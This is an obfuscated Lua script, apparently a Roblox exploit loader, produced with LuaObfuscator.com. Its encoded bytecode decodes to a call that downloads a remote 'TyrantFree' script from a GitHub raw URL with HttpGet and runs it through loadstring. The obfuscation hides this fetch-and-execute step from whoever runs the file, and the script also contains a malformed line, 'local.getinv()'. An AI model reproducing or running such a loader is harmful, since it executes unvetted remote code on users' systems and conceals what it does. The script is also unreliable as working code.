--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.7) ~  Much Love, Ferib 

]]--

script_key = "HugVoPwoJhH927vLgaf" local.getinv()

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v86=v2(v0(v30,16));if v19 then local v115=0;local v116;while true do if (v115==1) then return v116;end if (v115==0) then v116=v5(v86,v19);v19=nil;v115=1;end end else return v86;end end end);local function v20(v31,v32,v33) if v33 then local v87=(1637 -(1523 + 114)) -0 ;local v88;while true do if (v87==(0 -0)) then v88=(v31/(((3 + 0) -1)^(v32-(2 -1))))%((621 -(555 + 64))^(((v33-(932 -(857 + 74))) -(v32-1)) + (569 -(367 + 201)))) ;return v88-(v88%((1322 -394) -(214 + 713))) ;end end else local v89=(1 + 1)^(v32-((1066 -(68 + 997)) + 0)) ;return (((v31%(v89 + v89))>=v89) and 1) or (877 -(282 + 595)) ;end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35=1270 -((1183 -(892 + 65)) + 1044) ;local v36;local v37;while true do if (v35==(4 -3)) then return (v37 * (373 -(32 + (202 -117)))) + v36 ;end if (v35==(0 + 0)) then v36,v37=v1(v16,v18,v18 + 2 );v18=v18 + 1 + 1 ;v35=1;end end end local function v23() local v38,v39,v40,v41=v1(v16,v18,v18 + (5 -2) );v18=v18 + (7 -3) ;return (v41 * (16777566 -(87 + 263))) + (v40 * (65716 -(67 + 113))) + (v39 * (188 + (166 -98))) + v38 ;end local function v24() local v42=0 + 0 ;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v42==3) then if (v47==(0 -0)) then if (v46==(952 -(802 + 150))) then return v48 * ((430 -(44 + 386)) -0) ;else local v129=0 -0 ;while true do if (v129==((772 -(201 + 571)) + 0)) then v47=998 -(915 + (1220 -(116 + 1022))) ;v45=0;break;end end end elseif (v47==(5796 -(5235 -(998 + 488)))) then return ((v46==(0 + 0)) and (v48 * ((1 -0)/(1187 -(1069 + 118))))) or (v48 * NaN) ;end return v8(v48,v47-1023 ) * (v45 + (v46/((4 -(1 + 1))^52))) ;end if (v42==(3 -(1 + 0))) then v47=v20(v44,4 + 17 ,54 -(95 -72) );v48=((v20(v44,32 + 0 )==(792 -(368 + 423))) and  -(3 -2)) or 1 ;v42=(13 + 8) -(10 + 8) ;end if (v42==1) then v45=3 -2 ;v46=(v20(v44,443 -(416 + 26) ,63 -43 ) * ((1 + 1)^(56 -24))) + v43 ;v42=2;end if (v42==(438 -(145 + 293))) then v43=v23();v44=v23();v42=1;end end end local function v25(v49) local v50=0 -0 ;local v51;local v52;while true do if (v50==(7 -5)) then v52={};for v117=860 -(814 + 45) , #v51 do v52[v117]=v2(v1(v3(v51,v117,v117)));end v50=(23 -16) -4 ;end if ((1 + 2)==v50) then return v6(v52);end if (v50==(1 + 0)) then v51=v3(v16,v18,(v18 + v49) -1 );v18=v18 + v49 ;v50=887 -((1235 -974) + 624) ;end if (v50==(0 -(0 + 0))) then v51=nil;if  not v49 then v49=v23();if (v49==((3718 -2638) -(1020 + 60))) then return "";end end v50=1424 -(630 + 793) ;end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v53=(function() return function(v90,v91,v92,v93,v94,v95,v96,v97) local v90=(function() return 0 + 0 ;end)();local v91=(function() return;end)();local v93=(function() return;end)();while true do if (v90~=(836 -(660 + 176))) then else local v123=(function() return 0 + 0 ;end)();local v124=(function() return;end)();while true do if (v123==(202 -(14 + 188))) then v124=(function() return 675 -(534 + 141) ;end)();while true do if (0~=v124) then else v91=(function() return v92();end)();v93=(function() return nil;end)();v124=(function() return 1;end)();end if (v124==1) then v90=(function() return  #"/";end)();break;end end break;end end end if (v90~= #"}") then else if (v91== #",") then v93=(function() return v92()~=(0 + 0) ;end)();elseif (v91==(2 + 0)) then v93=(function() return v94();end)();elseif (v91== #"gha") then v93=(function() return v95();end)();end v96[v97]=(function() return v93;end)();break;end end return v90,v91,v92,v93,v94,v95,v96,v97;end;end)();local v54=(function() return function(v98,v99,v100,v101,v102,v103,v104,v105,v106) local v107=(function() return 0 + 0 ;end)();local v98=(function() return;end)();local v99=(function() return;end)();while true do local v114=(function() return 0;end)();while true do if ((0 -0)~=v114) then else if (v107==(1 -0)) then local v130=(function() return 0;end)();while true do if (v130~=(0 -0)) then else local v132=(function() return 0 + 0 ;end)();while true do if (v132~=0) then else while true do if (v98==0) then v99=(function() return v100();end)();if (v101(v99, #"|", #"|")==0) then local v175=(function() return 0 + 0 ;end)();local v176=(function() return;end)();local v177=(function() return;end)();local v178=(function() return;end)();while true do if (v175==(399 -(115 + 281))) then if (v101(v177, #"nil", #"19(")== #"[") then v178[ #"0836"]=(function() return v104[v178[ #"0836"]];end)();end v105[v106]=(function() return v178;end)();break;end if (v175==(0 -0)) then v176=(function() return v101(v99,2 + 0 , #"gha");end)();v177=(function() return v101(v99, #"?id=",14 -8 );end)();v175=(function() return 3 -2 ;end)();end if (v175~=1) then else local v180=(function() return 867 -(550 + 317) ;end)();while true do if (v180~=(0 -0)) then else local v184=(function() return 0 -0 ;end)();while true do if (v184==(0 -0)) then v178=(function() return {v102(),v102(),nil,nil};end)();if (v176==0) then local v185=(function() return 285 -(134 + 151) ;end)();local v186=(function() return;end)();while true do if (v185~=(1665 -(970 + 695))) then else v186=(function() return 0 -0 ;end)();while true do if (v186==(1990 -(582 + 1408))) then v178[ #"-19"]=(function() return v102();end)();v178[ #"asd1"]=(function() return v102();end)();break;end end break;end end elseif (v176== #"<") then v178[ #"xxx"]=(function() return v103();end)();elseif (v176==2) then v178[ #"91("]=(function() return v103() -(2^16) ;end)();elseif (v176~= #"-19") then else local v191=(function() return 0;end)();local v192=(function() return;end)();while true do if (v191==0) then v192=(function() return 0;end)();while true do if (v192~=0) then else v178[ #"nil"]=(function() return v103() -((6 -4)^(19 -3)) ;end)();v178[ #"asd1"]=(function() return v102();end)();break;end end break;end end end v184=(function() return 3 -2 ;end)();end if (v184==(1825 -(1195 + 629))) then v180=(function() return 1;end)();break;end end end if (v180~=(1 -0)) then else v175=(function() return 243 -(187 + 54) ;end)();break;end end end if (v175~=(782 -(162 + 618))) then else if (v101(v177, #"<", #"|")~= #" ") then else v178[2]=(function() return v104[v178[2]];end)();end if (v101(v177,2,2 + 0 )== #"!") then v178[ #"nil"]=(function() return v104[v178[ #"xnx"]];end)();end v175=(function() return 3;end)();end end end break;end end return v98,v99,v100,v101,v102,v103,v104,v105,v106;end end end end end if (v107==(0 + 0)) then v98=(function() return 0;end)();v99=(function() return nil;end)();v107=(function() return 1 -0 ;end)();end break;end end end end;end)();local v55=(function() return function(v108,v109,v110) local v111=(function() return 0 -0 ;end)();while true do if (v111~=(0 + 0)) then else local v126=(function() return 1636 -(1373 + 263) ;end)();while true do if (v126==0) then v108[v109-#"," ]=(function() return v110();end)();return v108,v109,v110;end end end end end;end)();local v56=(function() return {};end)();local v57=(function() return {};end)();local v58=(function() return {};end)();local v59=(function() return {v56,v57,nil,v58};end)();local v60=(function() return v23();end)();local v61=(function() return {};end)();for v69= #"~",v60 do FlatIdent_61B23,Type,v21,Cons,v24,v25,v61,v69=(function() return v53(FlatIdent_61B23,Type,v21,Cons,v24,v25,v61,v69);end)();end v59[ #"xxx"]=(function() return v21();end)();for v70= #":",v23() do FlatIdent_946F,Descriptor,v21,v20,v22,v23,v61,v56,v70=(function() return v54(FlatIdent_946F,Descriptor,v21,v20,v22,v23,v61,v56,v70);end)();end for v71= #"[",v23() do v57,v71,v28=(function() return v55(v57,v71,v28);end)();end return v59;end local function v29(v63,v64,v65) local v66=v63[1];local v67=v63[586 -(57 + 527) ];local v68=v63[1 + 2 ];return function(...) local v72=v66;local v73=v67;local v74=v68;local v75=v27;local v76=1 -0 ;local v77= -(1 -0);local v78={};local v79={...};local v80=v12("#",...) -(1 + 0) ;local v81={};local v82={};for v112=0,v80 do if ((v112>=v74) or (74>=143)) then v78[v112-v74 ]=v79[v112 + 1 ];else v82[v112]=v79[v112 + 1 ];end end local v83=(v80-v74) + 1 ;local v84;local v85;while true do local v113=0 -0 ;while true do if (v113==0) then v84=v72[v76];v85=v84[1];v113=342 -(218 + 123) ;end if ((18<2112) and (v113==(1582 -(1535 + 46)))) then if (v85<=((1433 -(41 + 1386)) + 0)) then if ((1097<=1628) and (v85<=(1 + (104 -(17 + 86))))) then if (v85<=(560 -(208 + 98 + 254))) then v82[v84[1 + 1 ]]=v65[v84[5 -2 ]];elseif ((4630==4630) and (v85==(1468 -(899 + 568)))) then local v137=v84[2 + 0 ];local v138,v139=v75(v82[v137](v13(v82,v137 + (2 -1) ,v84[606 -(268 + (747 -412)) ])));v77=(v139 + v137) -(291 -(60 + 230)) ;local v140=572 -(426 + (422 -276)) ;for v161=v137,v77 do v140=v140 + 1 + 0 ;v82[v161]=v138[v140];end else local v141=v84[1458 -(282 + 1174) ];v82[v141]=v82[v141](v13(v82,v141 + ((978 -(122 + 44)) -((982 -413) + 242)) ,v77));end elseif (v85<=(11 -7)) then if ((3540>2683) and (v85>(1 + 2))) then local v143=0;local v144;while true do if (v143==(1024 -(706 + 318))) then v144=v84[2];v82[v144]=v82[v144](v13(v82,v144 + (3 -2) ,v77));break;end end else local v145=1251 -(587 + 134 + 77 + 453) ;local v146;local v147;while true do if ((4794>=3275) and (v145==(1272 -(945 + (660 -334))))) then v82[v146 + (2 -1) ]=v147;v82[v146]=v147[v84[4 + 0 ]];break;end if (v145==0) then v146=v84[702 -(271 + 429) ];v147=v82[v84[3 + 0 ]];v145=1501 -(1408 + 92) ;end end end elseif (v85>5) then do return;end else v82[v84[1088 -(461 + 625) ]]=v65[v84[1291 -(993 + 295) ]];end elseif (v85<=(74 -(30 + 35))) then if (v85<=(1 + 6)) then v82[v84[1173 -(418 + 753) ]]=v84[2 + 1 ];elseif (v85>8) then v82[v84[2]]();else v82[v84[1 + 1 ]]=v84[1 + 0 + (1259 -(1043 + 214)) ];end elseif ((1484==1484) and (v85<=((11 -8) + 8))) then if (v85==(539 -((1618 -(323 + 889)) + 123))) then local v152=v84[2];local v153=v82[v84[(4769 -2997) -(1749 + 20) ]];v82[v152 + 1 + 0 ]=v153;v82[v152]=v153[v84[1326 -(1249 + 73) ]];else do return;end end elseif (v85==(5 + 7)) then local v157=v84[1147 -(466 + 679) ];local v158,v159=v75(v82[v157](v13(v82,v157 + (2 -1) ,v84[8 -5 ])));v77=(v159 + v157) -(1901 -((686 -(361 + 219)) + 1794)) ;local v160=0 + 0 ;for v164=v157,v77 do local v165=0 + 0 ;while true do if (v165==(0 -0)) then v160=v160 + (2 -(321 -(53 + 267))) ;v82[v164]=v158[v160];break;end end end else v82[v84[2]]();end v76=v76 + (115 -(4 + 110)) ;break;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403433O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F7268726A68726E2F547972616E7446722O652D2F6D61696E2F52656C656173652100083O00124O00013O00122O000100023O00200A000100010003001208000300044O000C000100034O00045O00022O000D3O000100012O00063O00017O00",v9(),...);
